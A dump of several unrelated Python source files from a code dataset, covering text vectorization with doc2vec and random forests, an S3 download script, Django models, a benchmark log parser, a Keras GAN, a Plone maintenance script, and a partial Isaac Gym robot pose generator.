doc2vec paper: https://cs.stanford.edu/~quocle/paragraph_vector.pdf\n# has a neural net with 1 hidden layer and 50 units/nodes\n# documentation at https://radimrehurek.com/gensim/models/doc2vec.html\n# https://radimrehurek.com/gensim/models/doc2vec.html#gensim.models.doc2vec.Doc2Vec\n# tutorial on GitHub: \n# https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/doc2vec-lee.ipynb\n\nprint('\nBegin Doc2Vec Work')\ncores = multiprocessing.cpu_count()\nprint(\"\nNumber of processor cores:\", cores)\n\ntrain_corpus = [TaggedDocument(doc, [i]) for i, doc in enumerate(train_tokens)]\n# print('train_corpus[:2]:', train_corpus[:2])\n\n# Instantiate a Doc2Vec model with a vector size of 50 \n# and iterate over the training corpus 40 times. \n# Set the minimum word count to 2 in order to discard words \n# with very few occurrences. 
\n# window (int, optional) – The maximum distance between the \n# current and predicted word within a sentence.\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 50\")\nmodel_50 = Doc2Vec(train_corpus, vector_size = 50, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_50.train(train_corpus, total_examples = model_50.corpus_count, \n\tepochs = model_50.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_50_vectors = np.zeros((len(train_tokens), 50)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_50_vectors[i,] = model_50.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_50_vectors.shape:', doc2vec_50_vectors.shape)\n# print('doc2vec_50_vectors[:2]:', doc2vec_50_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_50_vectors_test = np.zeros((len(test_tokens), 50)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_50_vectors_test[i,] = model_50.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_50_vectors_test.shape:', doc2vec_50_vectors_test.shape)\n\ndoc2vec_50_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_50_clf.fit(doc2vec_50_vectors, train_target) # fit model on training set\ndoc2vec_50_pred = doc2vec_50_clf.predict(doc2vec_50_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_50/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_50_pred, average='macro'), 3)) \n\n#%%\n\n# =============================================================================\n# Doc2Vec Vectorization (100 dimensions)\n# =============================================================================\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 100\")\nmodel_100 = Doc2Vec(train_corpus, vector_size = 100, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_100.train(train_corpus, total_examples = model_100.corpus_count, \n\tepochs = model_100.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_100_vectors = np.zeros((len(train_tokens), 100)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_100_vectors[i,] = model_100.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_100_vectors.shape:', doc2vec_100_vectors.shape)\n# print('doc2vec_100_vectors[:2]:', doc2vec_100_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_100_vectors_test = np.zeros((len(test_tokens), 100)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_100_vectors_test[i,] = model_100.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_100_vectors_test.shape:', doc2vec_100_vectors_test.shape)\n\ndoc2vec_100_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_100_clf.fit(doc2vec_100_vectors, train_target) # fit model on training set\ndoc2vec_100_pred = doc2vec_100_clf.predict(doc2vec_100_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_100/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_100_pred, average='macro'), 3)) \n\n#%%\n# =============================================================================\n# Doc2Vec Vectorization (200 dimensions)\n# =============================================================================\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 200\")\nmodel_200 = 
Doc2Vec(train_corpus, vector_size = 200, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_200.train(train_corpus, total_examples = model_200.corpus_count, \n\tepochs = model_200.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_200_vectors = np.zeros((len(train_tokens), 200)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_200_vectors[i,] = model_200.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_200_vectors.shape:', doc2vec_200_vectors.shape)\n# print('doc2vec_200_vectors[:2]:', doc2vec_200_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_200_vectors_test = np.zeros((len(test_tokens), 200)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_200_vectors_test[i,] = model_200.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_200_vectors_test.shape:', doc2vec_200_vectors_test.shape)\n\ndoc2vec_200_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_200_clf.fit(doc2vec_200_vectors, train_target) # fit model on training set\ndoc2vec_200_pred = doc2vec_200_clf.predict(doc2vec_200_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_200/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_200_pred, average='macro'), 3)) \n\n#%%\n# =============================================================================\n# Print Results\n# =============================================================================\n\nprint('\\n\\n------------------------------------------------------------------------')\nprint('\\nTF-IDF/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, tfidf_pred, average='macro'), 3))\nprint('\\nCount/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, count_pred, average='macro'), 3))\nprint('\\nHashing/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, hashing_pred, average='macro'), 3))\nprint('\\nDoc2Vec_50/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_50_pred, average='macro'), 3)) \nprint('\\nDoc2Vec_100/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_100_pred, average='macro'), 3)) \nprint('\\nDoc2Vec_200/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_200_pred, average='macro'), 3)) \nprint('\\n------------------------------------------------------------------------')","sub_path":"economics/run_economics.py","file_name":"run_economics.py","file_ext":"py","file_size_in_byte":24163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353198100","text":"# Kills in current instance.\n# By Robert Cordingly\n\nimport boto3\nimport sys\n\ndef listInstances(ec2Client):\n instances = []\n response = ec2Client.describe_instances()\n for reservation in response[\"Reservations\"]:\n for instance in reservation[\"Instances\"]:\n instances.append(instance)\n return instances\n\ndef findOurInstance(ec2Client, jobID):\n instances = listInstances(ec2Client)\n for instance in instances:\n if 'Tags' in instance and 'State' in instance:\n if instance['State']['Name'] != 'pending' and instance['State']['Name'] != 'running':\n continue\n tags = instance['Tags']\n for keyPair in 
tags:\n if keyPair['Key'] == 'jobID' and keyPair['Value'] == str(jobID):\n return instance\n return None\n\ndef terminateInstance(ec2Client, ec2Resource, ourInstance):\n if (ourInstance is not None):\n instance = ec2Resource.Instance(ourInstance['InstanceId'])\n instance.terminate()\n\npath = sys.argv[1]\njobID = sys.argv[2]\naccessKey = sys.argv[3]\nsecretKey = sys.argv[4]\n\nif (len(sys.argv) == 6):\n\tsessionToken = sys.argv[5]\nelse:\n\tsessionToken = \"\"\n\nbotoSession = boto3.Session (\n\taws_access_key_id = accessKey,\n\taws_secret_access_key = secretKey,\n\taws_session_token = sessionToken, \n\tregion_name = 'us-east-1'\n)\n\ns3Client = botoSession.client('s3')\ns3Client.download_file('easyrl-' + str(jobID), path, path)","sub_path":"lambda/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91831054","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nCHOICES_TIPO_USER = (\n ('USU', 'USUÁRIO'),\n ('CAN', 'CANDIDATO'),\n ('CLI', 'CLIENTE'),\n)\n\nDEFAULT_THEME_ANONYMOUS = ('smoothness', \"Smoothness\")\nCHOICES_THEME = (\n ('spa', \"SPA WEB\"),\n ('cupertino', \"Cupertino\"),\n ('dark-hive', \"Dark Hive\"),\n ('eggplant', \"Eggplant\"),\n ('flick', \"Flick\"),\n ('overcast', \"Overcast\"),\n ('pepper-grinder', \"Pepper Grinder\"),\n ('redmond', \"Redmond\"),\n ('smoothness', \"Smoothness\"),\n ('south-street', \"South Street\"),\n ('start', \"Start\"),\n ('sunny', \"Sunny\"),\n ('ui-darkness', \"UI darkness\"),\n ('ui-lightness', \"UI lightness\"),\n ('blitzer', \"Blitzer\"),\n ('humanity', \"Humanity\"),\n ('hot-sneaks', \"Hot Sneaks\"),\n ('excite-bike', \"Excite Bike\"),\n ('vader', \"Vader\"),\n ('dot-luv', \"Dot Luv\"),\n ('mint-choc', \"Mint Choc\"),\n ('black-tie', \"Black Tie\"),\n ('trontastic', \"Trontastic\"),\n ('swanky-purse', \"Swanky Purse\"),\n \n)\n\nclass PerfilUser(models.Model):\n user = models.OneToOneField(User, primary_key=True)\n tipo = models.CharField(max_length=3, choices=CHOICES_TIPO_USER)\n tema = models.CharField(max_length=15)\n \n def get_label(self):\n return dict(CHOICES_THEME)[self.tema]\n ","sub_path":"lab_django1_4/ui_theme_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319212478","text":"import os\nimport glob\nimport sys\nimport csv\nimport logging\n\nif sys.version_info[0] < 3:\n print('You must use Python 3')\n\n exit()\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n handlers=[\n logging.FileHandler('parser.log'),\n logging.StreamHandler()\n ]\n)\n\nDIRECTORY = '../data/'\n\n# Generate a CSV file with the results\noutput = csv.writer(open('results.csv', 'w'), delimiter=';')\n\nheader = [\n 'forwarders',\n 'clients',\n 'processes',\n 'layout',\n 'spatiality',\n 'odirect',\n 'stonewall',\n 'request',\n 'total',\n 'operation',\n 'time',\n 'transfered',\n 'bandwidth'\n]\n\noutput.writerow(header)\n\n# Get all .bash files\nexperiments = sorted([f for f in glob.glob(DIRECTORY + \"*.slurm\", recursive=True)])\n\nfor experiment in experiments:\n logging.info('parsing {}'.format(experiment))\n\n # Open the file and get the configuration\n with open(experiment) as f:\n lines = f.readlines()\n\n # Ge the number of processes\n slurm_processes = 
None\n slurm_forwarders = None\n slurm_clients = None\n\n for line in lines:\n if 'EXPERIMENT_NUMBER_PROCESSES' in line and slurm_processes is None:\n slurm_processes = int(line.strip().split('=')[1])\n continue\n\n if 'EXPERIMENT_NUMBER_FORWARDERS' in line and slurm_forwarders is None:\n slurm_forwarders = int(line.strip().split('=')[1])\n continue\n\n if 'EXPERIMENT_NUMBER_CLIENTS' in line and slurm_clients is None:\n slurm_clients = int(line.strip().split('=')[1])\n continue\n\n # Get the experiment ID\n\n experiment_id = (experiment.split('-')[1]).split('.')[0]\n\n # Get the .time file\n path = '{}/FORGE-{}-*/emulation.time'.format(DIRECTORY, experiment_id)\n\n files = glob.glob(path)\n\n if not files:\n logging.warning('missing .time file for experiment {}'.format(experiment_id))\n else:\n for filename in files:\n with open(filename, 'r') as f:\n lines = f.readlines()\n\n json_operation = ''\n\n json_write_time = None\n json_read_time = None\n\n for line in lines:\n if 'forwarders' in line:\n json_forwarders = int(line.strip().split()[1])\n continue\n if 'clients' in line:\n json_clients = int(line.strip().split()[1])\n continue\n if 'layout' in line:\n json_layout = int(line.strip().split()[1])\n continue\n if 'spatiality' in line:\n json_spatiality = int(line.strip().split()[1])\n continue\n if 'odirect' in line:\n json_odirect = int(line.strip().split()[1])\n continue\n if 'stonewall' in line:\n json_stonewall = int(line.strip().split()[1])\n continue\n if 'request' in line:\n json_request = int(line.strip().split()[1])\n continue\n if 'total' in line:\n json_total = int(line.strip().split()[1])\n continue\n\n if 'WRITE' in line:\n json_operation = 'write'\n continue\n if 'READ' in line:\n json_operation = 'read'\n continue\n\n if 'max' in line and json_operation == 'write':\n json_write_time = float(line.strip().split(':')[1].split()[0])\n continue\n if 'data' in line and json_operation == 'write':\n json_write_transfered = float(line.strip().split(':')[1].split()[0])\n continue\n if 'bandwidth' in line and json_operation == 'write':\n json_write_bandwidth = float(line.strip().split(':')[1].split()[0])\n continue\n\n if 'max' in line and json_operation == 'read':\n json_read_time = float(line.strip().split(':')[1].split()[0])\n continue\n if 'data' in line and json_operation == 'read':\n json_read_transfered = float(line.strip().split(':')[1].split()[0])\n continue\n if 'bandwidth' in line and json_operation == 'read':\n json_read_bandwidth = float(line.strip().split(':')[1].split()[0])\n continue\n\n if json_write_time:\n write_results = [\n slurm_forwarders,\n slurm_clients,\n json_clients,\n json_layout,\n json_spatiality,\n json_odirect,\n json_stonewall,\n json_request,\n json_total,\n 'write',\n json_write_time,\n json_write_transfered,\n json_write_bandwidth\n ]\n\n output.writerow(write_results)\n\n if json_read_time:\n read_results = [\n slurm_forwarders,\n slurm_clients,\n json_clients,\n json_layout,\n json_spatiality,\n json_odirect,\n json_stonewall,\n json_request,\n json_total,\n 'read',\n json_read_time,\n json_read_transfered,\n json_read_bandwidth\n ]\n\n output.writerow(read_results)\n","sub_path":"run/output/marenostrum-4/results/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199357533","text":"#Using sys for command-line tools.\n#add.py\nimport sys\n\ndef adding(*y):\n sum = 0.0\n for x in y:\n try:\n sum+=float(x)\n except 
Exception:\n continue\n return sum\n\nif len(sys.argv) <= 1:\n print(\" Usage: python3 add.py < nums >\\n Add some numbers together\")\nelse:\n print(adding(*sys.argv))","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502938516","text":"import collections\nimport typing\n\nimport attr\n\nimport tman.entities.competitor as competitor_entities\n\n\n@attr.s\nclass Competitor(competitor_entities.Competitor):\n pool = attr.ib(\n type=typing.Optional[int],\n validator=attr.validators.optional(\n attr.validators.instance_of(int),\n ),\n default=None,\n )\n lot = attr.ib(\n type=typing.Optional[int],\n validator=attr.validators.optional(\n attr.validators.instance_of(int),\n ),\n default=None,\n )\n\n @classmethod\n def from_data(cls, data: dict) -> \"Competitor\":\n return cls(\n id=data['id'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n birthday=data['birthday'],\n gender=data['gender'],\n club_id=data['club_id'],\n pool=data['pool'],\n lot=data['lot'],\n )\n\n\nclass PhaseCompetitors(collections.UserList):\n def append(\n self,\n item: competitor_entities.Competitor,\n pool: int=None,\n lot: int=None,\n ):\n self.data.append(\n Competitor(\n **attr.asdict(item),\n pool=pool,\n lot=lot,\n )\n )\n\n def remove(\n self,\n item: typing.Union[Competitor, competitor_entities.Competitor],\n ):\n if isinstance(item, Competitor):\n return self.data.remove(item)\n else:\n to_be_removed = next(\n (\n c for c in self.data\n if c.id == item.id\n ),\n None,\n )\n if not to_be_removed:\n raise ValueError('Competitor not in list')\n\n self.data.remove(to_be_removed)\n","sub_path":"tman_entities/tman/entities/phase/competitor.py","file_name":"competitor.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308082567","text":"from write_tfrecords import write_seg_data_to_tfrecords, load_name\nfrom read_data import DataReader\nimport os\n\ntrain_data_path = 'E:/data/sig17_seg/v_based_3level/train/'\ntest_data_path = 'E:/data/sig17_seg/v_based_3level/test/'\n\noutput_path = 'E:/data/TFRecords/'\n\ntrain_label_path = 'D:/data/sig17_seg_benchmark/segs/train/vbased/'\ntest_label_path = 'D:/data/sig17_seg_benchmark/segs/test/vbased/'\n\ntrain_name = []\ntest_name = []\n\ntrain_name = load_name(\"D:/data/sig17_seg/MDGCNN_dataset/train.txt\")\ntest_name = load_name(\"D:/data/sig17_seg/MDGCNN_dataset/test.txt\")\n\nwrite_seg_data_to_tfrecords(train_data_path, train_label_path, output_path, 'seg_train_3level_tan', train_name, start_level=0, level_num=3)\nwrite_seg_data_to_tfrecords(test_data_path, test_label_path, output_path, 'seg_test_3level_tan', test_name, start_level=0, level_num=3)\n","sub_path":"PFCNN/Generate_Dataset/HumanSeg_dataset.py","file_name":"HumanSeg_dataset.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189259478","text":"import numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Flatten, Reshape, LeakyReLU, Input, BatchNormalization,Dropout\nfrom keras.optimizers import Adam\nfrom keras.regularizers import L1L2\nimport matplotlib.pyplot as plt\n\n\nclass GAN:\n def __init__(self):\n # shape of input image\n self.image_shape = (28, 28, 1)\n self.noise_shape = (20,)\n self.optimiser = Adam(0.0002, 0.5)\n\n # now we 
create both our networks\n\n self.generator = self.build_generator()\n self.generator.compile(optimizer=self.optimiser, loss='binary_crossentropy')\n\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(optimizer=self.optimiser, loss='binary_crossentropy', metrics=['accuracy'])\n\n noise = Input(self.noise_shape)\n img = self.generator(noise)\n self.discriminator.trainable = False\n\n validity = self.discriminator(img)\n\n self.combined = Model(noise, validity) # let the fake data flow through gen into the discriminator\n self.combined.compile(optimizer=self.optimiser, loss='binary_crossentropy')\n\n def build_generator(self):\n # the generator will be a fully connected network\n # with input noise vector of shape (20,)\n # the output of the generator will be a 28x28 image\n \n model = Sequential()\n model.add(Dense(256, input_shape=self.noise_shape))\n model.add(LeakyReLU())\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.50))\n\n model.add(Dense(512))\n model.add(LeakyReLU())\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(0.50))\n\n model.add(Dense(784, activation='tanh'))\n model.add(Reshape(self.image_shape))\n print('Generator model : ')\n print(model.summary())\n\n noise = Input(self.noise_shape)\n gen_img = model(noise)\n\n return Model(noise, gen_img)\n\n def build_discriminator(self):\n # this is a simple FCN\n # input for the discriminator is a 28x28 image\n\n model = Sequential()\n model.add(Flatten(input_shape=self.image_shape)) # flatten the 28 x 28 image into one dimension\n\n model.add(Dense(512))\n model.add(LeakyReLU())\n # model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n model.add(Dense(256))\n model.add(LeakyReLU())\n # model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n model.add(Dense(1, activation='sigmoid')) # output a single value\n print('Discriminator model : ')\n print(model.summary())\n\n img = Input(self.image_shape)\n validity = model(img)\n\n return Model(img, validity)\n\n def train(self, X, epochs=1, batch_size=64):\n\n \n X_train = (X.astype(np.float32)-127.5) / 127.5\n X_train = X_train.reshape((X.shape[0], 28, 28, 1))\n \n \n\n for epoch in range(epochs + 1):\n # -----------train discriminator ------------\n \n idx = np.random.randint(0, X.shape[0], batch_size) # randomly grab 64 samples; idx is an nd.array\n real_imgs = X_train[idx]\n noise = np.random.normal(0, 1, (batch_size, 20)) # 64 noise vectors of length 20\n fakes = self.generator.predict(noise) # generate data from the noise\n\n ####\n\n ################# real_imgs \n # Dataset # ------------------|\n ################# | #################\n # |——————————> # DIS #\n # noise ################# fakes | #################\n # —————————————— # GEN # ------------------|\n #################\n\n ####\n\n d_loss_real = self.discriminator.train_on_batch(real_imgs, np.ones((batch_size, 1))) # train dis on the real data first, then run the fakes through\n d_loss_fake = self.discriminator.train_on_batch(fakes, np.zeros((batch_size, 1))) # data match label\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake) # average the separate losses from the two passes\n \n # print(d_loss_real)\n # print(\"============\")\n # print(d_loss_fake)\n # print(np.zeros((64, 1)))\n\n # --------------train generator -------------------\n\n # Train the generator (to have the discriminator label samples as valid)\n # try to fool the discriminator\n noise = np.random.normal(0, 1, (batch_size, 20))\n valid_y = [1] * batch_size\n g_loss = self.combined.train_on_batch(noise, valid_y)\n # Hung-Yi Li : think of gen and dis together as one giant network whose input is a vector, namely the noise\n # so conceptually we feed in an image produced by gen, but in practice it is just a vector; combined simply joins the two models.\n \n 
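# log this batch's progress: discriminator loss/accuracy and generator loss\n            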
print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (epoch, d_loss[0], 100 * d_loss[1], g_loss))\n\n if epoch % 1000 == 0:\n self.save_imgs(epoch)\n\n\n def save_imgs(self, epoch):\n r, c = 3, 3\n noise = np.random.normal(0, 1, (r * c, 20))\n gen_imgs = self.generator.predict(noise)\n\n # Rescale images 0 - 1\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n fig, axs = plt.subplots(r, c)\n cnt = 0\n for i in range(r):\n for j in range(c):\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap=None) \n axs[i, j].axis('off')\n cnt += 1\n fig.savefig(\"mona_lisa%d.png\" % epoch)\n plt.close()\n\n\nif __name__ == '__main__':\n gan = GAN()\n mona_lisa = np.load(\"mona_lisa.npy\")\n gan.train(X=mona_lisa)\n","sub_path":"BasicGAN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386283703","text":"from opengever.base.behaviors.lifecycle import ILifeCycleMarker\nfrom opengever.base.behaviors.lifecycle import ILifeCycle\nfrom opengever.maintenance.debughelpers import setup_app\nfrom opengever.maintenance.debughelpers import setup_option_parser\nfrom opengever.maintenance.debughelpers import setup_plone\nfrom plone import api\nimport logging\nimport sys\nimport transaction\n\n\nlogger = logging.getLogger('opengever.maintenance')\nhandler = logging.StreamHandler(stream=sys.stdout)\nlogging.root.addHandler(handler)\nlogging.root.setLevel(logging.INFO)\n\n\nclass CustodyPeriodResetter(object):\n \"\"\"Resets the custody periods\n \"\"\"\n\n def __init__(self, plone, options):\n self.plone = plone\n self.options = options\n self.catalog = api.portal.get_tool('portal_catalog')\n\n def run(self):\n for item in self.catalog.unrestrictedSearchResults(\n object_provides=[ILifeCycleMarker.__identifier__]):\n obj = item.getObject()\n\n ILifeCycle(obj).custody_periods = 0\n\n\ndef main():\n app = setup_app()\n parser = setup_option_parser()\n parser.add_option(\"-n\", dest=\"dry_run\", action=\"store_true\", default=False)\n options, args = parser.parse_args()\n\n if options.dry_run:\n logger.warn('transaction doomed because we are in dry-mode.')\n transaction.doom()\n\n plone = setup_plone(app, options)\n CustodyPeriodResetter(plone, options).run()\n if options.dry_run:\n logger.warn('skipping commit because we are in dry-mode.')\n else:\n transaction.commit()\n logger.info('done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"opengever/maintenance/scripts/reset_custody_period.py","file_name":"reset_custody_period.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302321918","text":"import glob\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport scipy.spatial as spatial\nfrom isaacgym import gymapi, gymtorch\nfrom isaacgym.torch_utils import to_torch, torch_rand_float\nfrom rlgpu.utils.config import (\n get_args,\n load_cfg,\n parse_sim_params,\n set_np_formatting,\n set_seed,\n)\nimport torch\n\n\nclass GeneratePoses:\n def __init__(\n self, args, cfg, sim_params, physics_engine, device_type, device_id, headless\n ):\n self.gym = gymapi.acquire_gym()\n self.args = args\n self.cfg = cfg\n self.headless = headless\n self.sim_params = sim_params\n self.physics_engine = physics_engine\n self.device_type = device_type\n self.device_id = device_id\n self.device = \"cpu\"\n if self.device_type == \"cuda\" or self.device_type == \"GPU\":\n self.device = \"cuda\" + \":\" + str(self.device_id)\n 
self.task_name = self.args.task.lower()\n\n self.spacing = self.cfg[\"env\"][\"env_spacing\"]\n\n self.up_axis = \"z\"\n self.up_axis_idx = 2\n\n self.visual_attachments = self.cfg[\"robot\"][\"visual_attachments\"]\n self.dof_damping = self.cfg[\"robot\"][\"dof_damping\"]\n self.dof_stiffness = self.cfg[\"robot\"][\"dof_stiffness\"]\n\n self.num_dofs = self.cfg[\"env\"][\"num_dofs\"]\n\n self.workspace_size = self.cfg[\"robot\"][\"workspace_size\"]\n self.curriculum_sizes = self.cfg[\"robot\"][\"curriculum_sizes\"]\n\n if not self.args.record and not self.args.split:\n raise ValueError(\" *** Need to select either --record or --split\")\n\n if self.args.record and not self.args.num_samples:\n raise ValueError(\n \" *** Need to specify the --num_samples to record (1 = 1 million samples)\"\n )\n\n if self.args.split and not self.args.headless:\n raise ValueError(\n \" *** Need to be in headless mode to split the data into curriculums\"\n )\n\n self.num_envs = self.args.num_envs\n\n self.create_sim()\n\n def create_sim(self):\n # allocates which device will simulate and which device will render the scene and simulation type to be used\n self.sim_params.up_axis = gymapi.UP_AXIS_Z\n self.sim_params.gravity.x = 0\n self.sim_params.gravity.y = 0\n self.sim_params.gravity.z = -9.81\n self.sim_params.use_gpu_pipeline = False\n if args.use_gpu_pipeline:\n print(\"WARNING: Forcing CPU pipeline.\")\n self.sim = self.gym.create_sim(\n self.device_id, self.device_id, self.physics_engine, self.sim_params\n )\n if self.sim is None:\n print(\"*** Failed to create sim\")\n quit()\n self._create_ground_plane()\n self._create_envs(spacing=self.spacing, num_per_row=int(np.sqrt(self.num_envs)))\n\n def _create_ground_plane(self):\n plane_params = gymapi.PlaneParams()\n plane_params.normal = gymapi.Vec3(0.0, 0.0, 1.0)\n self.gym.add_ground(self.sim, plane_params)\n\n # create viewer\n if self.headless == False:\n self.viewer = self.gym.create_viewer(self.sim, gymapi.CameraProperties())\n cam_pos = gymapi.Vec3(np.sqrt(self.num_envs) * self.spacing * 2, np.sqrt(self.num_envs) * self.spacing * 2, 8.0)\n cam_target = gymapi.Vec3(np.sqrt(self.num_envs), np.sqrt(self.num_envs), -8.0)\n self.gym.viewer_camera_look_at(self.viewer, None, cam_pos, cam_target)\n if self.viewer is None:\n print(\"*** Failed to create viewer\")\n quit()\n\n def _create_envs(self, spacing, num_per_row):\n # set up the env grid (it is a 3-dimensional box constructed by the lower and upper)\n lower = gymapi.Vec3(-spacing, -spacing, 0.0)\n upper = gymapi.Vec3(spacing, spacing, spacing)\n\n # load robot assets\n asset_root = \"../../assets\"\n robot_asset_file = f\"urdf/{self.task_name}/{self.task_name}.urdf\"\n\n robot_asset_options = gymapi.AssetOptions()\n robot_asset_options.fix_base_link = True\n robot_asset_options.flip_visual_attachments = self.visual_attachments\n robot_asset_options.collapse_fixed_joints = False\n robot_asset_options.disable_gravity = True\n robot_asset_options.thickness = 0.001\n robot_asset_options.use_mesh_materials = True\n\n print(\"Loading asset '%s' from '%s'\" % (robot_asset_file, asset_root))\n robot_asset = self.gym.load_asset(\n self.sim, asset_root, robot_asset_file, robot_asset_options\n )\n\n robot_dof_stiffness = to_torch(self.dof_stiffness, dtype=torch.float)\n robot_dof_damping = to_torch(self.dof_damping, dtype=torch.float)\n num_robot_bodies = self.gym.get_asset_rigid_body_count(robot_asset)\n num_robot_dofs = self.gym.get_asset_dof_count(robot_asset)\n\n robot_dof_properties = 
self.gym.get_asset_dof_properties(robot_asset)\n\n self.robot_dof_lower_limits = []\n self.robot_dof_upper_limits = []\n\n for i in range(num_robot_dofs):\n robot_dof_properties[\"driveMode\"][i] = gymapi.DOF_MODE_POS\n\n robot_dof_properties[\"stiffness\"][i] = robot_dof_stiffness[i]\n robot_dof_properties[\"damping\"][i] = robot_dof_damping[i]\n\n self.robot_dof_lower_limits.append(robot_dof_properties[\"lower\"][i])\n self.robot_dof_upper_limits.append(robot_dof_properties[\"upper\"][i])\n\n self.robot_dof_lower_limits = to_torch(self.robot_dof_lower_limits)\n self.robot_dof_upper_limits = to_torch(self.robot_dof_upper_limits)\n\n # placement of the robot, xyz and quaternions determining if the robot stands upright\n robot_start_pose = gymapi.Transform()\n robot_start_pose.p = gymapi.Vec3(0.0, 0.0, 0.0)\n robot_start_pose.r = gymapi.Quat(0.0, 0.0, 0.0, 0.707107)\n\n # create the environment\n print(\"Creating %d environments\" % self.num_envs)\n\n envs = []\n robots = []\n\n for i in range(self.num_envs):\n # create env\n env_ptr = self.gym.create_env(self.sim, lower, upper, num_per_row)\n envs.append(env_ptr)\n\n # spawn the robot in a fixed location\n robot_actor = self.gym.create_actor(\n env_ptr, robot_asset, robot_start_pose, \"robot\", i, 1\n )\n self.gym.set_actor_dof_properties(\n env_ptr, robot_actor, robot_dof_properties\n )\n robots.append(robot_actor)\n\n link_names = [f\"{self.task_name}_link_{j}\" for j in range(num_robot_dofs + 1)]\n link_names.append(f\"{self.task_name}_link_ee\")\n self.link_handles = []\n for i in link_names:\n globals()[i] = self.gym.find_actor_rigid_body_handle(\n env_ptr, robot_actor, i\n )\n self.link_handles.append(globals()[i])\n\n self.init_data()\n\n def init_data(self):\n # acquire the rigid body tensor, wrap the tensor, and\n rigid_body_tensor = self.gym.acquire_rigid_body_state_tensor(self.sim)\n self.rigid_body_states = gymtorch.wrap_tensor(rigid_body_tensor).view(\n self.num_envs, -1, 13\n )\n\n self.gym.refresh_rigid_body_state_tensor(self.sim)\n\n # acquire the refreshed end-effector values from tensors\n self.end_effector_pos = self.rigid_body_states[:, self.link_handles[-1]][:, 0:3]\n self.end_effector_rot = 